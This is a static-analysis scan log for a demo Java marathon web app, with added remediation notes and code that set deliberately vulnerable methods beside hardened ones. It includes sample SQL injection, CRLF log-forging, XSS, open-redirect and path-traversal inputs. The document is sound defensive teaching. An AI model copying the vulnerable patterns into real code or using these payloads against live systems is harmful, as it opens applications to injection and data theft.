SQL_INJECTION_JDBC:
src/main/java/demo/dao/ResultsDAO.java#L32
This use of java/sql/Statement.executeQuery(Ljava/lang/String;)Ljava/sql/ResultSet; can be vulnerable to SQL injection (with JDBC)
|
SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE:
src/main/java/demo/dao/ResultsDAO.java#L32
demo.dao.ResultsDAO.loadResults(String, boolean) passes a nonconstant String to an execute or addBatch method on an SQL statement
|
DM_CONVERT_CASE:
src/main/java/demo/dao/RunnerDAO.java#L70
Use of non-localized String.toUpperCase() or String.toLowerCase() in demo.dao.RunnerDAO.searchRunners(String)
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/RunnerDAO.java#L107
demo.dao.RunnerDAO.hasRunnerFinished(String) may fail to clean up java.sql.Statement on checked exception
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/RunnerDAO.java#L27
demo.dao.RunnerDAO.loadRunner(long) may fail to clean up java.sql.Statement on checked exception
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/RunnerDAO.java#L45
demo.dao.RunnerDAO.loadRunnerByName(String) may fail to clean up java.sql.Statement on checked exception
|
ODR_OPEN_DATABASE_RESOURCE:
src/main/java/demo/dao/RunnerDAO.java#L194
demo.dao.RunnerDAO.getAllRunners() may fail to close PreparedStatement
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L214
demo.dao.RunnerDAO.getRunnersNotRegisteredOnAnyDiscipline() may fail to close database resource on exception
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L107
demo.dao.RunnerDAO.hasRunnerFinished(String) may fail to close database resource on exception
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L27
demo.dao.RunnerDAO.loadRunner(long) may fail to close database resource on exception
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L45
demo.dao.RunnerDAO.loadRunnerByName(String) may fail to close database resource on exception
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L67
demo.dao.RunnerDAO.searchRunners(String) may fail to close database resource on exception
|
SQL_INJECTION_JDBC:
src/main/java/demo/dao/RunnerDAO.java#L108
This use of java/sql/Statement.executeQuery(Ljava/lang/String;)Ljava/sql/ResultSet; can be vulnerable to SQL injection (with JDBC)
|
SQL_INJECTION_JDBC:
src/main/java/demo/dao/RunnerDAO.java#L125
This use of java/sql/Connection.prepareStatement(Ljava/lang/String;)Ljava/sql/PreparedStatement; can be vulnerable to SQL injection (with JDBC)
|
SQL_INJECTION_JDBC:
src/main/java/demo/dao/RunnerDAO.java#L68
This use of java/sql/Statement.executeQuery(Ljava/lang/String;)Ljava/sql/ResultSet; can be vulnerable to SQL injection (with JDBC)
|
SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE:
src/main/java/demo/dao/RunnerDAO.java#L108
demo.dao.RunnerDAO.hasRunnerFinished(String) passes a nonconstant String to an execute or addBatch method on an SQL statement
|
SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE:
src/main/java/demo/dao/RunnerDAO.java#L68
demo.dao.RunnerDAO.searchRunners(String) passes a nonconstant String to an execute or addBatch method on an SQL statement
|
SQL_PREPARED_STATEMENT_GENERATED_FROM_NONCONSTANT_STRING:
src/main/java/demo/dao/RunnerDAO.java#L125
A prepared statement is generated from a nonconstant String in demo.dao.RunnerDAO.createRunner(String, String, String, String, String, String, String, String)
|
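The SQL findings in ResultsDAO and RunnerDAO come in two flavours: executeQuery on a concatenated String (searchRunners, hasRunnerFinished, loadResults), and a PreparedStatement whose SQL text is itself non-constant (createRunner at RunnerDAO.java#L125). The second flavour is worth stressing: prepareStatement only protects the values that are bound with setXxx; anything concatenated into the SQL text is still injectable. The DAO package also collects a run of OBL/ODR warnings about Statements and ResultSets not closed on exception paths. The following is an added example, not the project's code, that addresses both families with one method; the table and column names are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;

// Added example, not the project's code: the searchRunners pattern with a
// constant SQL string, a bound parameter, LIKE escaping and try-with-resources.
public final class RunnerSearch {

    private RunnerSearch() {}

    // Vulnerable pattern: the query text is assembled from the search term, so
    // x' OR '1'='1 returns every row, and the Statement and ResultSet are only
    // closed on the happy path (the ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH case).
    public static List<String> searchVulnerable(Connection c, String term) throws SQLException {
        Statement st = c.createStatement();
        ResultSet rs = st.executeQuery(
                "SELECT username FROM runner WHERE LOWER(lastname) LIKE '%" + term.toLowerCase() + "%'");
        List<String> out = new ArrayList<>();
        while (rs.next()) {
            out.add(rs.getString(1));
        }
        rs.close();
        st.close();
        return out;
    }

    // LIKE has its own metacharacters. A bound parameter stops SQL injection,
    // but "%" or "_" in the term would still widen the match, so they are
    // escaped and the escape character is declared in the query.
    static String escapeLike(String s) {
        return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_");
    }

    // Hardened: constant SQL, one bound parameter, resources closed on every
    // path. The ResultSet is closed by its Statement anyway; closing it in its
    // own try keeps the obligation explicit for readers and for SpotBugs.
    public static List<String> searchSafely(Connection c, String term) throws SQLException {
        final String sql = "SELECT username FROM runner WHERE LOWER(lastname) LIKE ? ESCAPE '\\'";
        String pattern = "%" + escapeLike(term.toLowerCase(Locale.ROOT)) + "%";
        List<String> out = new ArrayList<>();
        try (PreparedStatement ps = c.prepareStatement(sql)) {
            ps.setString(1, pattern);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    out.add(rs.getString(1));
                }
            }
        }
        return out;
    }
}
```

For createRunner, the same rule applies to INSERT: the column list and placeholders are a constant string and all eight values go through setString; if any part of the statement really must vary (a table name, a sort column), it is chosen from a fixed set of server-side constants, never taken from the request.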
OBL_UNSATISFIED_OBLIGATION:
src/main/java/demo/dao/SystemDAO.java#L20
demo.dao.SystemDAO.createAccount(String, String) may fail to clean up java.sql.Statement
|
ODR_OPEN_DATABASE_RESOURCE:
src/main/java/demo/dao/SystemDAO.java#L20
demo.dao.SystemDAO.createAccount(String, String) may fail to close PreparedStatement
|
CRLF_INJECTION_LOGS:
src/main/java/demo/filter/AccessLogFilter.java#L47
This use of java/util/logging/Logger.info(Ljava/lang/String;)V might be used to include CRLF characters into log messages
|
DM_DEFAULT_ENCODING:
src/main/java/demo/filter/AccessLogFilter.java#L52
Found reliance on default encoding in demo.filter.AccessLogFilter.init(FilterConfig): new java.io.FileWriter(File)
|
PATH_TRAVERSAL_IN:
src/main/java/demo/filter/AccessLogFilter.java#L45
This API (java/io/File.<init>(Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
PATH_TRAVERSAL_IN:
src/main/java/demo/filter/AccessLogFilter.java#L51
This API (java/io/File.<init>(Ljava/io/File;Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/filter/AccessLogFilter.java#L49
Exceptional return value of java.io.File.mkdir() ignored in demo.filter.AccessLogFilter.init(FilterConfig)
|
SERVLET_HEADER_USER_AGENT:
src/main/java/demo/filter/AccessLogFilter.java#L82
The header "User-Agent" can easily be spoofed by the client
|
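The AccessLogFilter findings belong together: CRLF_INJECTION_LOGS because a request value is written to Logger.info without neutralising line breaks, and SERVLET_HEADER_USER_AGENT because that value is the User-Agent header, which the client sets freely. A forged header containing a newline lets a client write a second, fabricated line into the access log. The following is an added example, not the project's code; the log format and the length caps are assumptions.

```java
import java.util.logging.Logger;
import javax.servlet.http.HttpServletRequest;

// Added example, not the project's code: neutralising control characters
// before client-controlled text reaches the access log.
public final class AccessLogLine {

    private static final Logger LOG = Logger.getLogger("access");

    private AccessLogLine() {}

    // Replaces CR, LF and every other control character with a visible escape,
    // escapes non-ASCII so terminal control sequences cannot be smuggled, and
    // caps the length so one header cannot bloat the log.
    static String sanitize(String s, int max) {
        if (s == null) {
            return "-";
        }
        StringBuilder b = new StringBuilder(Math.min(s.length(), max));
        int i = 0;
        for (; i < s.length() && b.length() < max; i++) {
            char ch = s.charAt(i);
            if (ch < 0x20 || ch == 0x7f) {
                b.append(String.format("\\x%02x", (int) ch));
            } else if (ch > 0x7e) {
                b.append(String.format("\\u%04x", (int) ch));
            } else {
                b.append(ch);
            }
        }
        if (i < s.length()) {
            b.append("...");
        }
        return b.toString();
    }

    // User-Agent is attacker-chosen text: record it, sanitised, and never
    // base an access decision on it.
    public static String format(HttpServletRequest req) {
        String ua = sanitize(req.getHeader("User-Agent"), 256);
        String uri = sanitize(req.getRequestURI(), 1024);
        String q = sanitize(req.getQueryString(), 1024);
        return req.getRemoteAddr() + " \"" + req.getMethod() + " " + uri
             + ("-".equals(q) ? "" : "?" + q) + "\" \"" + ua + "\"";
    }

    public static void log(HttpServletRequest req) {
        LOG.info(format(req));
    }

    public static void main(String[] args) {
        // Constructed header value that would otherwise appear as two log lines.
        String forged = "Mozilla/5.0\r\n127.0.0.1 \"GET /admin HTTP/1.1\" 200";
        System.out.println(sanitize(forged, 256));
    }
}
```

A structured log format (one JSON object per line with the framework's own escaping) makes this kind of injection moot, but when the log is free text the sanitiser has to run on every client-controlled field, not just the header the scanner happened to name.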
BC_UNCONFIRMED_CAST:
src/main/java/demo/filter/SecurityFilter.java#L40
Unchecked/unconfirmed cast from javax.servlet.ServletResponse to javax.servlet.http.HttpServletResponse in demo.filter.SecurityFilter.doFilter(ServletRequest, ServletResponse, FilterChain)
|
SERVLET_PARAMETER:
src/main/java/demo/filter/SecurityFilter.java#L95
The method getParameterNames returns a String value that is controlled by the client
|
SERVLET_PARAMETER:
src/main/java/demo/filter/SecurityFilter.java#L98
The method getParameter returns a String value that is controlled by the client
|
SERVLET_PARAMETER:
src/main/java/demo/filter/SecurityFilter.java#L119
The method getParameterNames returns a String value that is controlled by the client
|
SERVLET_PARAMETER:
src/main/java/demo/filter/SecurityFilter.java#L123
The method getParameter returns a String value that is controlled by the client
|
XSS_SERVLET:
src/main/java/demo/filter/SecurityFilter.java#L60
This use of java/io/PrintWriter.print(Ljava/lang/Object;)V could be vulnerable to XSS in the Servlet
|
XSS_SERVLET:
src/main/java/demo/filter/SecurityFilter.java#L62
This use of java/io/PrintWriter.print(Ljava/lang/Object;)V could be vulnerable to XSS in the Servlet
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L83
Confusing to have methods demo.form.CreateAccountForm.getCreditcardNumber() and demo.pojo.Runner.getCreditCardNumber()
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L35
Confusing to have methods demo.form.CreateAccountForm.getFirstname() and demo.service.RunnerRegistration.getFirstName()
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L43
Confusing to have methods demo.form.CreateAccountForm.getLastname() and demo.service.RunnerRegistration.getLastName()
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L27
Confusing to have methods demo.form.CreateAccountForm.getUsername() and demo.service.RunnerRegistration.getUserName()
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L87
Confusing to have methods demo.form.CreateAccountForm.setCreditcardNumber(String) and demo.pojo.Runner.setCreditCardNumber(String)
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L39
Confusing to have methods demo.form.CreateAccountForm.setFirstname(String) and demo.service.RunnerRegistration.setFirstName(String)
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L47
Confusing to have methods demo.form.CreateAccountForm.setLastname(String) and demo.service.RunnerRegistration.setLastName(String)
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L31
Confusing to have methods demo.form.CreateAccountForm.setUsername(String) and demo.service.RunnerRegistration.setUserName(String)
|
EI_EXPOSE_REP:
src/main/java/demo/form/RunnerForm.java#L125
demo.form.RunnerForm.getDateOfBirthAsDate() may expose internal representation by returning RunnerForm.dateOfBirth
|
UWF_FIELD_NOT_INITIALIZED_IN_CONSTRUCTOR:
src/main/java/demo/pojo/Run.java#L29
Run.finishingSeconds not initialized in constructor and dereferenced in demo.pojo.Run.getFinishingPixels()
|
EI_EXPOSE_REP:
src/main/java/demo/pojo/Runner.java#L73
demo.pojo.Runner.getDateOfBirth() may expose internal representation by returning Runner.dateOfBirth
|
EI_EXPOSE_REP2:
src/main/java/demo/pojo/Runner.java#L28
new demo.pojo.Runner(Long, String, String, String, String, String, String, Date, String) may expose internal representation by storing an externally mutable object into Runner.dateOfBirth
|
EI_EXPOSE_REP2:
src/main/java/demo/pojo/Runner.java#L76
demo.pojo.Runner.setDateOfBirth(Date) may expose internal representation by storing an externally mutable object into Runner.dateOfBirth
|
EI_EXPOSE_REP:
src/main/java/demo/pojo/Upload.java#L32
demo.pojo.Upload.getData() may expose internal representation by returning Upload.data
|
EI_EXPOSE_REP2:
src/main/java/demo/pojo/Upload.java#L36
demo.pojo.Upload.setData(byte[]) may expose internal representation by storing an externally mutable object into Upload.data
|
BEAN_PROPERTY_INJECTION:
src/main/java/demo/service/MarathonService.java#L222
JavaBeans property name populated with user controlled parameters
|
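BEAN_PROPERTY_INJECTION at MarathonService.java#L222 sits inside the updateRunner(HttpServletRequest, String, Map) endpoint listed a few entries below: the keys of a client-supplied map are being used as JavaBeans property names. That lets the client set properties the endpoint never meant to expose (the Runner POJO on this page has a setCreditCardNumber(String) setter, for instance) and, with older commons-beanutils, walk nested paths through the class property. The following is an added example, not the project's code; the writable property names are assumptions, and the introspector used is the one commons-beanutils added in 1.9.2.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Set;
import org.apache.commons.beanutils.BeanUtils;
import org.apache.commons.beanutils.BeanUtilsBean;
import org.apache.commons.beanutils.ConvertUtilsBean;
import org.apache.commons.beanutils.PropertyUtilsBean;
import org.apache.commons.beanutils.SuppressPropertiesBeanIntrospector;

// Added example, not the project's code: populating a Runner from a client map
// without letting the client decide which properties are written.
public final class RunnerUpdate {

    // Only these properties may be set by the update endpoint (assumed names).
    // Deliberately absent: id, creditCardNumber, and anything under "class".
    private static final Set<String> WRITABLE = Set.of("firstName", "lastName", "email");

    private static final BeanUtilsBean BEAN_UTILS;
    static {
        PropertyUtilsBean pu = new PropertyUtilsBean();
        // commons-beanutils 1.9.2+: hides the "class" property so that
        // "class.classLoader.*" style paths cannot be resolved at all.
        pu.addBeanIntrospector(SuppressPropertiesBeanIntrospector.SUPPRESS_CLASS);
        BEAN_UTILS = new BeanUtilsBean(new ConvertUtilsBean(), pu);
    }

    private RunnerUpdate() {}

    // Vulnerable pattern: every key in the request map becomes a setter call.
    public static void applyUnfiltered(Object runner, Map<String, Object> input) throws Exception {
        BeanUtils.populate(runner, input);
    }

    // Hardened: unknown keys are dropped before populate runs, and the
    // rejected keys are returned so the caller can log them or fail the request.
    public static Map<String, Object> applyFiltered(Object runner, Map<String, Object> input)
            throws Exception {
        Map<String, Object> accepted = new HashMap<>();
        Map<String, Object> rejected = new HashMap<>();
        for (Map.Entry<String, Object> e : input.entrySet()) {
            if (WRITABLE.contains(e.getKey()) && e.getValue() instanceof String) {
                accepted.put(e.getKey(), e.getValue());
            } else {
                rejected.put(e.getKey(), e.getValue());
            }
        }
        BEAN_UTILS.populate(runner, accepted);
        return rejected;
    }
}
```

The plainest fix needs no library at all: read the three allowed keys out of the map and call the three setters by name. Reflection-based population is convenient, but the allow-list then has to live in code that the scanner can see, as above, rather than in the shape of the incoming request.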
COOKIE_USAGE:
src/main/java/demo/service/MarathonService.java#L256
Sensitive data may be stored by the application in a cookie
|
COOKIE_USAGE:
src/main/java/demo/service/MarathonService.java#L257
Sensitive data may be stored by the application in a cookie
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L52
demo.service.MarathonService.checkWinner(String) is a REST Web Service endpoint

|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L74
demo.service.MarathonService.createRunner(RunnerRegistration) is a REST Web Service endpoint
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L185
demo.service.MarathonService.deleteRunnerPhoto(HttpServletRequest, String) is a REST Web Service endpoint
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L111
demo.service.MarathonService.getProfilePic(String, int, int) is a REST Web Service endpoint
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L165
demo.service.MarathonService.getUnregisteredRunners(HttpServletRequest) is a REST Web Service endpoint
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L35
demo.service.MarathonService.listRunners() is a REST Web Service endpoint
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L210
demo.service.MarathonService.updateRunner(HttpServletRequest, String, Map) is a REST Web Service endpoint
|
PATH_TRAVERSAL_IN:
src/main/java/demo/service/MarathonService.java#L118
This API (java/io/File.<init>(Ljava/io/File;Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
SIC_INNER_SHOULD_BE_STATIC_ANON:
src/main/java/demo/service/MarathonService.java#L141
The class demo.service.MarathonService$1 could be refactored into a named _static_ inner class
|
XSS_SERVLET:
src/main/java/demo/util/MonitoringServlet.java#L39
This use of java/io/PrintWriter.println(Ljava/lang/String;)V could be vulnerable to XSS in the Servlet
|
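The XSS_SERVLET findings in SecurityFilter (two PrintWriter.print(Object) calls) and MonitoringServlet (PrintWriter.println(String)) all describe the same defect: a value that can originate from the request is written into an HTML response without encoding. The following is an added example, not the project's code; the page fragment and the parameter name are assumptions.

```java
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Added example, not the project's code: client-controlled text reaches the
// HTML body only through an escaper.
public final class HtmlOut {

    private HtmlOut() {}

    // Escapes the five characters that change HTML structure in text and in
    // double-quoted attribute values. Not sufficient inside <script>, in a URL
    // attribute or in CSS; those contexts need their own encoders.
    public static String escapeHtml(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder b = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  b.append("&amp;");  break;
                case '<':  b.append("&lt;");   break;
                case '>':  b.append("&gt;");   break;
                case '"':  b.append("&quot;"); break;
                case '\'': b.append("&#39;");  break;
                default:   b.append(c);
            }
        }
        return b.toString();
    }

    // Vulnerable: a request parameter printed straight into the body.
    public static void writeVulnerable(HttpServletRequest req, HttpServletResponse resp)
            throws IOException {
        PrintWriter w = resp.getWriter();
        w.print("<p>Blocked value: " + req.getParameter("value") + "</p>");
    }

    // Hardened: explicit charset in the Content-Type so the browser cannot be
    // coaxed into another encoding, nosniff so the body is treated only as
    // declared, and escaping at the point of output.
    public static void writeSafely(HttpServletRequest req, HttpServletResponse resp)
            throws IOException {
        resp.setContentType("text/html; charset=UTF-8");
        resp.setHeader("X-Content-Type-Options", "nosniff");
        PrintWriter w = resp.getWriter();
        w.print("<p>Blocked value: " + escapeHtml(req.getParameter("value")) + "</p>");
    }

    public static void main(String[] args) {
        // Constructed payload of the kind a filter that echoes a blocked value would receive.
        System.out.println(escapeHtml("<script>alert(document.cookie)</script>"));
    }
}
```

A security filter that echoes the offending parameter back to the user is a common place for this bug precisely because the value is, by construction, hostile; returning a fixed message and logging the value (sanitised, as under CRLF_INJECTION_LOGS) avoids the problem entirely.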
HRS_REQUEST_PARAMETER_TO_HTTP_HEADER:
src/main/java/demo/util/PermalinkServlet.java#L32
HTTP parameter directly written to HTTP header output in demo.util.PermalinkServlet.doGet(HttpServletRequest, HttpServletResponse)
|
SERVLET_PARAMETER:
src/main/java/demo/util/PermalinkServlet.java#L27
The method getParameter returns a String value that is controlled by the client
|
UNVALIDATED_REDIRECT:
src/main/java/demo/util/PermalinkServlet.java#L32
The following redirection could be used by an attacker to redirect users to a phishing website.
|
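The three PermalinkServlet findings describe one flow: a request parameter is read at line 27 and, at line 32, written into a response header by a redirect. That is both a header-injection vector (HRS_REQUEST_PARAMETER_TO_HTTP_HEADER) and an open redirect (UNVALIDATED_REDIRECT), since the target can be any URL the link's author chose. The following is an added example, not the project's code, of accepting such a parameter only when it is a local path; the default target is an assumption.

```java
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import javax.servlet.http.HttpServletResponse;

// Added example, not the project's code: a redirect target from the request is
// honoured only when it is a relative path on this application.
public final class SafeRedirect {

    private static final String DEFAULT = "/";   // assumed fallback

    private SafeRedirect() {}

    // Rejects absolute URLs, scheme-relative "//evil.example" forms, backslashes
    // (browsers treat "\" as "/"), control characters (CR/LF would end the
    // Location header), and anything not rooted at "/".
    public static String localPathOrDefault(String candidate) {
        if (candidate == null || candidate.isEmpty()) {
            return DEFAULT;
        }
        for (int i = 0; i < candidate.length(); i++) {
            char c = candidate.charAt(i);
            if (c < 0x20 || c == 0x7f || c == '\\') {
                return DEFAULT;
            }
        }
        if (!candidate.startsWith("/") || candidate.startsWith("//")) {
            return DEFAULT;
        }
        try {
            URI u = new URI(candidate);
            if (u.getScheme() != null || u.getAuthority() != null) {
                return DEFAULT;
            }
        } catch (URISyntaxException e) {
            return DEFAULT;
        }
        return candidate;
    }

    public static void redirect(HttpServletResponse resp, String next) throws IOException {
        resp.sendRedirect(localPathOrDefault(next));
    }

    public static void main(String[] args) {
        // Constructed candidates: one legitimate path and several escape attempts.
        String[] inputs = { "/runner/42", "https://evil.example/", "//evil.example/",
                            "/\\evil.example", "/ok\r\nSet-Cookie: a=b", "javascript:alert(1)" };
        for (String s : inputs) {
            System.out.println(s.replace("\r", "\\r").replace("\n", "\\n") + " -> " + localPathOrDefault(s));
        }
    }
}
```

For a permalink specifically there is a stronger design: the parameter is an opaque identifier that the servlet looks up in a server-side table of known targets, so no URL ever travels through the request at all.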
PATH_TRAVERSAL_IN:
src/main/java/demo/util/PhotoLoader.java#L50
This API (java/io/File.<init>(Ljava/io/File;Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
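PATH_TRAVERSAL_IN is the most repeated vulnerability-class finding on this page: UpdateRunnerPhotoAction (three sites), AccessLogFilter, MarathonService.getProfilePic and PhotoLoader all construct a java.io.File from a string that the scanner traces back to the request. new File(dir, name) joins the two strings; it does not confine name to dir, so "../../WEB-INF/web.xml" escapes. The following is an added example, not the project's code, that serves all of those sites; the name alphabet and the temp-directory demonstration are constructed for the example, and Files.writeString needs Java 11 or later.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.regex.Pattern;

// Added example, not the project's code: resolving a client-supplied photo
// name under a fixed directory so that it cannot escape that directory.
public final class PhotoPaths {

    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9][A-Za-z0-9._-]{0,63}");

    private PhotoPaths() {}

    // Vulnerable pattern: string joining only.
    public static File resolveVulnerable(File photoDir, String name) {
        return new File(photoDir, name);
    }

    // Hardened: syntactic allow-list first (no separators, no leading dot),
    // then a canonical-path containment check that also defeats symlinks and
    // "..", then a regular-file check so directories and devices are refused.
    public static Path resolveSafely(Path photoDir, String name) throws IOException {
        if (!SAFE_NAME.matcher(name).matches()) {
            throw new IOException("rejected photo name");
        }
        Path base = photoDir.toRealPath();                 // canonical, symlinks resolved
        Path candidate = base.resolve(name).normalize();
        if (!candidate.startsWith(base)) {                 // component-wise, so "photos2" is not under "photos"
            throw new IOException("path escapes photo directory");
        }
        Path real = candidate.toRealPath();                // fails if the file does not exist
        if (!real.startsWith(base) || !Files.isRegularFile(real)) {
            throw new IOException("not a regular file under photo directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("photos");   // constructed demonstration directory
        Files.writeString(dir.resolve("42.jpg"), "not really a jpeg");
        System.out.println("ok: " + resolveSafely(dir, "42.jpg"));
        for (String bad : new String[] { "../42.jpg", "/etc/passwd", "..", "x/y.jpg", ".htaccess" }) {
            try {
                resolveSafely(dir, bad);
                System.out.println("accepted " + bad + " (check is NOT in effect)");
            } catch (IOException e) {
                System.out.println("rejected " + bad + ": " + e.getMessage());
            }
        }
    }
}
```

For the write side (checkAndSaveImage) the simplest hardening is to not use the client's name at all and derive the file name from the runner's own identifier plus a validated extension; the containment check above is then a second line of defence rather than the only one.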
SERVLET_PARAMETER:
src/main/java/demo/util/PhotoLoader.java#L49
The method getParameter returns a String value that is controlled by the client
|
MS_PKGPROTECT:
src/main/java/demo/util/SessionListener.java#L42
demo.util.SessionListener.hexArray should be package protected
|
TRUST_BOUNDARY_VIOLATION:
src/main/java/demo/util/SessionListener.java#L32
The application mixes trusted and untrusted data in session attributes.
|
SAST-Scan
The following actions uses node12 which is deprecated and will be forced to run on node16: jwgmeligmeyling/spotbugs-github-action@master. For more info: https://github.blog/changelog/2023-06-13-github-actions-all-actions-will-run-on-node16-instead-of-node12-by-default/
|
SAST-Scan
The following actions use a deprecated Node.js version and will be forced to run on node20: jwgmeligmeyling/spotbugs-github-action@master. For more info: https://github.blog/changelog/2024-03-07-github-actions-all-actions-will-run-on-node20-instead-of-node16-by-default/
|
SAST-Scan
Failed minimum severity level. Found vulnerabilities with level 'medium' or higher
|